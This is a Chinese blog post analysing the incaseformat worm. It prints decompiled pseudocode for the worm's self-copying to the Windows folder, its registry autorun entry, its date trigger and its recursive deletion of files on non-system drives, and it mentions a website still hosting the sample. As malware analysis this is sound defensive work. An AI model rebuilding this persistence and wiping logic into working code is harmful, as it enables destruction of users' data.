incaseformat病毒分析

最新推荐文章于 2021-03-29 20:59:33 发布
最新推荐文章于 2021-03-29 20:59:33 发布
阅读量5.6k 收藏 9
点赞数 8
分类专栏: 病毒 逆向工程 网络安全 文章标签: 安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/whatiwhere/article/details/112610716
版权

愚人节病毒 ???

不同于熊猫烧香 彩虹猫 之前的钉_钉病毒,
2021年1月13号 incaseformat蠕虫病毒来袭,会自动复制到windows目录下,并写入注册表,重启电脑后,病毒会遍历除了系统盘外的所有磁盘进行删除。

钉_钉病毒

病毒检出率

在这里插入图片描述

病毒行为分析

PEID分析
在这里插入图片描述

使用Borland Delphi 6.0 - 7.0 [Overlay]编写

先查看字符串信息
进行定位
在这里插入图片描述

危险函数相关代码

int TForm1_FormCreate()
{
  __writefsdword(0, (unsigned int)&v17);
  System::ParamStr(0);
  Sysutils::ExtractFilePath(v43);
  System::ParamStr(0);
  Sysutils::ExtractFileName(v40);
  v14 = unknown_libname_69(v41) - 4;
  System::ParamStr(0);
  Sysutils::ExtractFileName(v39);
  System::__linkproc__ LStrCopy(&v42);
  System::__linkproc__ LStrCat(&System::AnsiString, v42);
  if ( (unsigned __int8)Sysutils::DirectoryExists(System::AnsiString) )
  {
    System::ParamStr(0);
    Sysutils::ExtractFilePath(v37);
    System::ParamStr(0);
    Sysutils::ExtractFileName(v34);
    unknown_libname_69(v35);
    System::ParamStr(0);
    Sysutils::ExtractFileName(v33);
    System::__linkproc__ LStrCopy(&v36);
    System::__linkproc__ LStrCatN(&v38, 3, v0, v36, &str___16[1]);
    v1 = (const CHAR *)System::__linkproc__ LStrToPChar(v38);
    ShellExecuteA(0, 0, v1, 0, 0, 1);
  }
  if ( !(unsigned __int8)Sysutils::FileExists((const int)&str_C__windows_tsay[1]) )
  {
    System::ParamStr(0);
    v2 = (const CHAR *)System::__linkproc__ LStrToPChar(v32);
    CopyFileA(v2, "C:\\windows\\tsay.exe", -1);
    v3 = (Registry::TRegistry *)Registry::TRegistry::TRegistry((Registry::TRegistry *)dword_4259E4);
    Registry::TRegistry::SetRootKey(v3, 0x80000002);
    LOBYTE(v4) = 1;
    Registry::TRegistry::OpenKey(v3, (const int)&str_SOFTWARE_Micros[1], v4);
    Registry::TRegistry::WriteString(v3, &str_msfsa[1], &str_C__windows_tsay[1]);
    Registry::TRegistry::CloseKey(v3);
    v5 = System::TObject::Free(v3);
    System::__linkproc__ Halt0(v5);
  }
  v16 = &savedregs;
  v15 = &loc_44F1A6;
  v14 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v14);
  System::ParamStr(0);
  v6 = (const CHAR *)System::__linkproc__ LStrToPChar(v31);
  CopyFileA(v6, "C:\\windows\\tsay.exe", 0);
  __writefsdword(0, v14);
  v16 = &savedregs;
  v15 = &loc_44F20F;
  v14 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v14);
  v7 = (Registry::TRegistry *)Registry::TRegistry::TRegistry((Registry::TRegistry *)dword_4259E4);
  Registry::TRegistry::SetRootKey(v7, 0x80000002);
  LOBYTE(v8) = 1;
  Registry::TRegistry::OpenKey(v7, (const int)&str_SOFTWARE_Micros[1], v8);
  Registry::TRegistry::WriteString(v7, &str_msfsa[1], &str_C__windows_tsay[1]);
  Registry::TRegistry::CloseKey(v7);
  System::TObject::Free(v7);
  __writefsdword(0, v14);
  System::ParamStr(0);
  Sysutils::UpperCase(v29);
  v16 = v30;
  Sysutils::UpperCase((const int)&str_C__windows_tsay[1]);
  System::__linkproc__ LStrCmp(v16, v28);
  if ( v9 )
  {
    v16 = &savedregs;
    v15 = &loc_44F2C5;
    v14 = __readfsdword(0);
    __writefsdword(0, (unsigned int)&v14);
    System::ParamStr(0);
    v11 = (const CHAR *)System::__linkproc__ LStrToPChar(v24);
    CopyFileA(v11, "C:\\windows\\ttry.exe", 0);
    __writefsdword(0, v14);
    v12 = ShellExecuteA(0, 0, "C:\\windows\\ttry.exe", 0, 0, 0);
    System::__linkproc__ Halt0(v12);
  }
  System::ParamStr(0);
  Sysutils::UpperCase(v26);
  v16 = v27;
  Sysutils::UpperCase((const int)&str_C__windows_ttry[1]);
  v10 = System::__linkproc__ LStrCmp(v16, v25);
  if ( !v9 )
    System::__linkproc__ Halt0(v10);
  __writefsdword(0, v17);
  __writefsdword(0, (unsigned int)v21);
  v23 = &loc_44F32B;
  return System::__linkproc__ LStrArrayClr(&v24, 24);
}

其中 CopyFileA(v6, “C:\windows\tsay.exe”, 0);
与 CopyFileA(v11, “C:\windows\ttry.exe”, 0);
__writefsdword(0, v14);
v12 = ShellExecuteA(0, 0, “C:\windows\ttry.exe”, 0, 0, 0);

会先进行判断文件是否存在,将其写入注册表设置为开机自启,并将程序拷贝到 C盘Windows下
ShellExecuteA函数是windows的API函数,功能是执行可执行文件(exe)或任何关联文件(doc、txt、xls等)。
ShellExecute是异步执行的,不管执行的程序是否成功运行,运行的时间是长是短,ShellExecute函数都会立即返回。即执行ttry.exe程序
之后定位下一个函数

int __usercall TForm1_Timer2Timer@<eax>(int a1@<eax>, long double a2@<st0>)
{
  int v2; // edx@1
  int v3; // ebx@9
  signed int v4; // esi@10
  unsigned int v5; // edx@12
  unsigned int v7; // [sp-18h] [bp-44h]@1
  void *v8; // [sp-14h] [bp-40h]@1
  int *v9; // [sp-10h] [bp-3Ch]@1
  unsigned int v10; // [sp-Ch] [bp-38h]@1
  void *v11; // [sp-8h] [bp-34h]@1
  int *v12; // [sp-4h] [bp-30h]@1
  int v13; // [sp+Ch] [bp-20h]@1
  System::TObject *v14; // [sp+10h] [bp-1Ch]@1
  unsigned __int16 v15; // [sp+16h] [bp-16h]@1
  unsigned __int16 v16; // [sp+18h] [bp-14h]@1
  long double System::TDateTime; // [sp+1Ah] [bp-12h]@1
  int v18; // [sp+28h] [bp-4h]@1
  int savedregs; // [sp+2Ch] [bp+0h]@1

  v13 = 0;
  v18 = a1;
  v12 = &savedregs;
  v11 = &loc_44EFA1;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  unknown_libname_426(*(_DWORD *)(a1 + 764), 0);
  v9 = &savedregs;
  v8 = &loc_44EF84;
  v7 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v7);
  LOBYTE(v2) = 1;
  v14 = (System::TObject *)unknown_libname_42(cls_Classes_TStringList, v2);
  Sysutils::Now();
  *(double *)((char *)&System::TDateTime + 2) = a2;
  sub_44E5C8(&v14);
  Sysutils::DecodeDate(
    (const int)&System::TDateTime,
    &v16,
    &v15,
    *(unsigned __int16 **)((char *)&System::TDateTime + 2));
  if ( LOWORD(System::TDateTime) > 0x7D9u )
  {
    if ( v16 > 3u )
    {
      if ( v15 == 1 || v15 == 10 || v15 == 21 || v15 == 29 )
      {
        v3 = (*(int (**)(void))(*(_DWORD *)v14 + 20))() - 1;
        if ( v3 > 0 )
        {
          v4 = 1;
          do
          {
            (*(void (__fastcall **)(System::TObject *, signed int, int *))(*(_DWORD *)v14 + 12))(v14, v4, &v13);
            sub_44EC70(v13);
            ++v4;
            --v3;
          }
          while ( v3 );
        }
      }
      System::TObject::Free(v14);
      v5 = v7;
      __writefsdword(0, v7);
      v9 = (int *)&loc_44EF8B;
      LOBYTE(v5) = 1;
      unknown_libname_426(*(_DWORD *)(v18 + 764), v5);
    }
    else
    {
      System::__linkproc__ TryFinallyExit(v7, v8, v9);
    }
  }
  else
  {
    System::__linkproc__ TryFinallyExit(v7, v8, v9);
  }
  __writefsdword(0, v10);
  v12 = (int *)&loc_44EFA8;
  return System::__linkproc__ LStrClr(&v13);
}

着重关注判断语句
在这里插入图片描述

if ( LOWORD(System::TDateTime) > 2009u )
获取到系统时间,如果年份大于2009
if ( v16 > 3u )
如果月份大于3
if ( v15 == 1 || v15 == 10 || v15 == 21 || v15 == 29 )
如果日期等于1 或 等于10 或等于21 或等于29
就会触发 sub_44ec70
但是这段代码上方
在这里插入图片描述
会通过获取到当前时间之后,通过DecodeDate对时间进行处理

int __fastcall Sysutils::DecodeDate(const int System::TDateTime, unsigned __int16 *a2, unsigned __int16 *a3, int a4, unsigned __int16 *a5)
{
  unsigned __int16 v6; // [sp+6h] [bp-2h]@1

  return Sysutils::DecodeDateFully(System::TDateTime, a2, a3, a5, &v6);
}

具体算法如下:

int __fastcall Sysutils::DecodeDateFully(const int System::TDateTime, unsigned __int16 *a2, unsigned __int16 *a3, __int64 a4, unsigned __int16 *a5)
{
  v20 = (unsigned __int16 *)System::TDateTime;
  Sysutils::DateTimeToTimeStamp(*(double *)&a4);
  if ( v14 > 0 )
  {
    *a5 = v14 % 7 + 1;
    v6 = v14 - 1;
    for ( i = 1; v6 >= 146097; i += 400 )
      v6 -= 146097;
    unknown_libname_101(&v17);
    if ( v15 == 4 )
    {
      v15 = 3;
      v17 -= 29012;
    }
    unknown_libname_101(&v17);
    v8 = 4 * v15 + 100 * v15 + i;
    unknown_libname_101(&v17);
    if ( v15 == 4 )
    {
      v15 = 3;
      v17 += 365;
    }
    v9 = v15 + v8;
    v10 = Sysutils::IsLeapYear(v9);
    v5 = v10;
    v11 = (char *)&unk_4500DC + 24 * (unsigned __int8)v10;
    for ( j = 1; ; ++j )
    {
      v16 = *(_WORD *)&v11[2 * (unsigned __int16)j - 2];
      if ( v17 < v16 )
        break;
      v17 -= v16;
    }
    *v20 = v9;
    *v19 = j;
    *v18 = v17 + 1;
  }
  else
  {
    *v20 = 0;
    *v19 = 0;
    *v18 = 0;
    *a5 = 0;
    v5 = 0;
  }
  return v5;
}

导致算法执行后的结构与预期不符,原本会是2010年4月1号愚人节启动,缺阴差阳错的成了2021年1月13号执行,那么下次就是1月23和2月4号
具体原因是DateTimeToTimeStamp这个函数中出现了变量异常

int __fastcall Sysutils::DateTimeToTimeStamp(int a1, int a2, int a3, double a4)
{
  int v4; // ecx@1
  unsigned __int64 v5; // rax@1
  int v6; // edx@2
  unsigned __int64 v7; // rtt@2
  int v8; // eax@2
  unsigned __int64 v9; // rt2@3
  int result; // eax@4

  v4 = a1;
  v5 = (signed __int64)(a4 * flt_45017C);
  if ( SHIDWORD(v5) >= 0 )
  {
    v9 = v5 % (unsigned int)dword_450180;
    v8 = v5 / (unsigned int)dword_450180;
    v6 = v9;
  }
  else
  {
    LODWORD(v5) = -(signed int)v5;
    LODWORD(v7) = v5;
    HIDWORD(v7) = -HIDWORD(v5) - ((_DWORD)v5 != 0);
    v6 = v7 % (unsigned int)dword_450180;
    v8 = -(signed int)(v7 / (unsigned int)dword_450180);
  }
  result = v8 + 693594;
  *(_DWORD *)v4 = v6;
  *(_DWORD *)(v4 + 4) = result;
  return result;
}

这里的dword_450180 按照设计者最初的设想,其时间戳转日的值应该是 86400000ms 而这里是94854340
在这里插入图片描述

导致计算出的数值错误。
接下来看,程序对硬盘的操作

char __fastcall sub_44EC70(int a1)
{
   System::__linkproc__ LStrAddRef();
  unknown_libname_74(&FatTime, &byte_406E1C);
  v9 = &savedregs;
  v8 = &loc_44EE40;
  v7 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v7);
  v6 = &savedregs;
  v5 = &loc_44EDF7;
  v4 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v4);
  v1 = unknown_libname_69(v18);
  if ( *(_BYTE *)(v18 + v1 - 1) != 92 )
    System::__linkproc__ LStrCat(&v18, &str___15[1]);
  System::__linkproc__ LStrCat3(&v16, v18, &str_____0[1]);
  if ( !Sysutils::FindFirst(v16, 63, &FatTime) )
  {
    do
    {
      System::__linkproc__ LStrCmp(v15, &str___2[1]);
      if ( !v2 )
      {
        System::__linkproc__ LStrCmp(v15, &str____0[1]);
        if ( !v2 )
        {
          if ( v14 & 0x10 )
          {
            System::__linkproc__ LStrCat3(&v12, v18, v15);
            if ( !(unsigned __int8)sub_44EC70(v12) )
              v17 = 0;
          }
          else
          {
            System::__linkproc__ LStrCat3(&System::AnsiString, v18, v15);
            Sysutils::FileSetAttr(System::AnsiString, 0);
            System::__linkproc__ LStrCat3(&v10, v18, v15);
            Sysutils::DeleteFile(v10);
          }
        }
      }
    }
    while ( !Sysutils::FindNext(&FatTime) );
    Sysutils::FindClose(&FatTime);
  }
  Sysutils::FileSetAttr(v18, 0);
  v17 = (unsigned __int8)Sysutils::RemoveDir(v18) != 0;
  __writefsdword(0, v4);
  __writefsdword(0, v7);
  v9 = (int *)&loc_44EE47;
  System::__linkproc__ LStrArrayClr(&v10, 3);
  System::__linkproc__ FinalizeRecord(&FatTime, &byte_406E1C);
  System::__linkproc__ LStrClr(&v16);
  System::__linkproc__ LStrClr(&v18);
  return v17;
}

函数的主要功能是根据前缀路径 “.”匹配所有的文件,循环删除,遇到文件夹会进行递归删除
在这里插入图片描述

目前某招聘网站已被感染

网站存在文件上传漏洞,已经有病毒样本 2019年已被爆出 但目前依然可以下载
在这里插入图片描述
在这里插入图片描述

下载后的样本 与原病毒样本对比
在这里插入图片描述

使用IDA进行查看
在这里插入图片描述

可以确定为同一病毒
其病毒行为与原病毒行为一样
程序的图标同Windows的文件夹,错误点击后可能会弹窗报错,Windows7 测试,未报错。

在这里插入图片描述

电脑重启前
在这里插入图片描述

重启后 发现E盘占用空间依然有,但是文件以及没有了
在这里插入图片描述

windows7下出现的一些问题
在这里插入图片描述

PCHunter打开
在这里插入图片描述

能看到其运行的进程 ,原有执行文件已经消失

这个病毒对我没有危害: 因为我Windows只有C盘,个人感觉 固态硬盘 分区的意义好像不大

最后 一张图收尾 :

在这里插入图片描述

在这里插入图片描述
以前阅读量不到k现在 目前阅读量已经 100k+了 奥利给 !!!

whatiwhere
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
incaseformat样本赏析
yellow的博客
01-17 1148
incaseformat样本详细分析
incaseformat蠕虫病毒
Vdieoo的博客
01-14 3859
国内多个区域行业出现且感染主机多为财务管理相关应用系统。感染主机表现为所有非系统分区文件均被删除,由于被删除文件分区根目录下均存在名为incaseformat.log的空文件,因此网络上将此病毒命名为incaseformat。 ...
incaformat蠕虫病毒样本分析及查杀防范措施
世间繁华梦一出
01-14 3699
2021incaseformat蠕虫病毒一、病毒简介二、样本分析三、查杀与恢复方式四、预防措施 一、病毒简介 病毒名称:incaseformat 病毒性质:蠕虫病毒 影响范围:windows 操作系统 危害等级:紧急 病毒影响:删除除系统盘外的所有文件 二、样本分析 1.样本信息 md5:4b982fe1558576b420589faa9d55e81a sha1:a858c92a664491d1195370c20f2e4fa6b6ae5c3c sha256:ff84e79cae99f5714f363588b
incaseformat 病毒分析
玄道的网安博客
01-15 1047
近日,大量用户文件被删除,源于一个叫做incaseformat病毒,此病毒的主要传播方式是将自身伪装成文件目录,当用户双击时实际上是启动了病毒文件。病毒文件会隐匿在受害者主机中潜伏着,等待指定的时机对用户文件进行删除。实际上此病毒可能在2009年以前就已经存在,但由于编写者所使用的delphi库计算时间的函数有错误,导致近期才发作。此病毒可能已经伴随着受感染者很长一段时间。 此病毒运行后会将自身复制到以下路径 C:\\windows\\tsay.exe C:\\windows\\ttry.e.
Incaseformat蠕虫病毒分析
weixin_45484297的博客
03-29 1556
Incaseformat蠕虫病毒分析 01背景 1月13日, incaseformat病毒在全网集中爆发,中毒用户C盘以外所有文件被删除。 该病毒最早可以追溯到2009年,该病毒会在2010年4月1日(愚人节)触发删除文件逻辑;而此次爆发的病毒是经过篡改得到的变种,最早可以追溯到2014年。而实际上火绒、360等主流安全防护软件均能查杀这两个变种病毒,中毒用户多是未安装防护软件或是对该病毒添加了信任。 02样本概况 样本名称:tsay.exe 、ttry.exe 严重程度:高危 行为签名:设置注册表实现自
incaseformat样本详细分析(附样本下载)
Just for funnnnnnnnnnnn
01-16 4043
incaseformat样本详细分析 注:本文首发于我的博客:http://www.hupeiwei.com incaseformat病毒近日爆发,影响了不少主机。这么一个古老的病毒能够造成这么大的影响,令人感到意外。我从微步在线上下载了样本进行分析。需要注意的是,incaseformat有两个在野版本,详见https://www.52pojie.cn/thread-1351233-1-1.html。我分析的应该是原始版本,但是两个版本除了Sysutils::DateTimeToTimeStamp库函数所使
incaseformat蠕虫病毒样本分析
0leg的博客
01-15 2024
@[TOC]incaseformat蠕虫病毒样本分析 前言 2021年1月13日,incaseformat病毒在全网集中爆发,中毒用户C盘以外所有文件被删除。该病毒会格式化系统盘外的分区及删除数据,感染后会通过U盘进行传播,传播性强,隐蔽性高,危害性大。 安全工程师在该事件首次报告的逆向分析中,推测病毒程序制作存在错误,导致其爆发时间推迟到今年1月13日。而同行厂商也在后续报告中表明一致观点。但是,通过火绒威胁情报系统以及样本分析,工程师再次对病毒深度溯源发现,该病毒蛰伏至今才爆发,或为攻击者的精心策划。
incaseformat病毒的预防及应急处置
01-14
"incaseformat病毒预防及应急处置" 一、病毒描述 incaseformat 病毒是一种 早期的蠕虫病毒,它的攻击特点是删除硬盘除 C 盘外的所有文件,仅保留一个名为“incaseformat.log”的 0 字节文件。这种病毒可以被现有的...
INCASEFORMAT病毒来袭,猎鹰安全解决方案.docx
10-26
【INCASEFORMAT病毒详解】 INCASEFORMAT病毒是一种蠕虫病毒,以其极具破坏性的行为而闻名。该病毒通过U盘传播,隐藏正常文件夹并用同名的病毒母体替换,导致用户电脑上C盘以外的磁盘数据丢失或被格式化。病毒的主要...
暑假训练pwn(3) 不能被落下太远额
doudoudedi
07-30 191
实验吧的ropbaby 今天是一道ROP(64位)的我本地打不通nc连不上我服了 但这道题还是可以的我们 这个文件的main函数可以直接告诉我么system函数的地址然后我们就可以根据它给我们的libc文件得到偏移然后算出基地址,最后算出’/bin/sh’的地址然后ROP链起来用ROPgadget --binary libc-2.23.so --only ‘pop|ret’ 得到pop rdi...
html2canvas-1.0.0-rc.4版本
01-13
html2canvas-1.0.0-rc.4版本
破解常用API函数大全
06-12
api 函数 汇总 需要的拿走 希望可以帮到 那些需要的 人
【天磊卫士安全预警】incaseformat蠕虫病毒预警
Uguardsec的博客
01-14 599
安全预警 天磊卫士安全团队监测到incaseformat蠕虫病毒有重新泛滥的迹象,希望大家引起重视,以免中招。 病毒详情 首先incaseformat病毒是通过全盘镜像来起作用的,有一个负责在文件夹内生成这一病毒的进程,incaseformat.txt就是一个镜像文件。这种病毒有一个统一的名字:文件夹图标病毒。 这个病毒属于木马和蠕虫两类病毒的结合体。木马只是复制自己,并且用所在文件夹的名字给自己命名,然后把自己复制满你的文件夹,保证每个文件夹下都有木马。蠕虫会感染你的exe文件,也就是可执行程序,然后让你
160个CrackMe之001Acid burn破解思路
iqiqiya的博客
04-02 1236
 0x01:    查壳无壳0x02:    运行程序进行观察 发现有两个部分 我们先对Serial进行分析 0x03:          可以看到提示的错误信息为Failed!以及Try Again!!于是看可以直接载入OD进行动态调试右键反汇编窗口黑色空白部分 选择中文搜索引擎à智能搜索à接着右键findà输入Tryà可以发现离Failed比较近的是就是我们要找的  双击进入定位到关键代码 接...
关于AnsiSting的使用大全(转自ChinaBCB)
07-01 2872
Ansistring 转 char 代码: void __fastcall TForm1::Button1Click(TObject *Sender) { ? ? AnsiString Test = "哈哈"; ? ? char *chr = Test.c_str(); } ? ?char转Ansistring 代码: #include void __fastcall TFor
bugkuCTF平台逆向题第五道love题解
iqiqiya的博客
12-28 8414
题目链接: http://123.206.31.85/files/99278e700add95793a765b13ab1314ea/reverse_3.exe tips: 查壳无壳(截图略) 载入OD 搜索字符串 随意输入1111111111111111111 发现进行了base64加密 再向下单步 发现、 结合IDA看下 int su
2018网鼎杯re-advance复现笔记
沐沐的博客
08-23 1335
  拿到程序运行一下,可以看到输出一个16进制的串,我们感觉这应该是一个字符串加密后的结果,尝试把这个16进制的串转换成字符串,这里看到writeup中有用python的libnum库,可以很方便的实现这个操作。 这是libnum库的安装和使用方法:https://www.cnblogs.com/pcat/p/7225782.html &gt;&gt;&gt; libnum.n2s(0x4b...
CTF 【每日一题20160626】简单的PE文件逆向
hhhparty的博客
06-27 9814
简单的PE文件逆向 来源:http://ctf.idf.cn/index.php?g=game&m=article&a=index&id=38 题目:就在这里,很简单的~虽然我不会。。= =! http://pan.baidu.com/s/1dDzUL0X分析: 0.不明白PE为何物的,请参考文章: 初步认识PE: http://www.52pojie.cn/thread-15354
近期计算机病毒爆发,最新警示!最新电脑病毒全面爆发,沉寂已久的incaseformat蠕虫病毒肆虐横行!...
最新发布
05-17
非常感谢您提醒电脑病毒的爆发。确保您的电脑安全非常重要,您可以采取以下措施来保护您的电脑: 1. 及时更新您的操作系统和防病毒软件,确保其处于最新版本。 2. 不要打开未知的邮件或下载未知来源的文件,以防止病毒通过电子邮件传播。 3. 避免访问不受信任的网站和链接,以防止恶意软件袭击您的计算机。 4. 使用强密码,不要使用相同的密码在多个网站上。 5. 定期备份您的数据以防止数据丢失。 希望这些措施可以帮助保护您的电脑。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值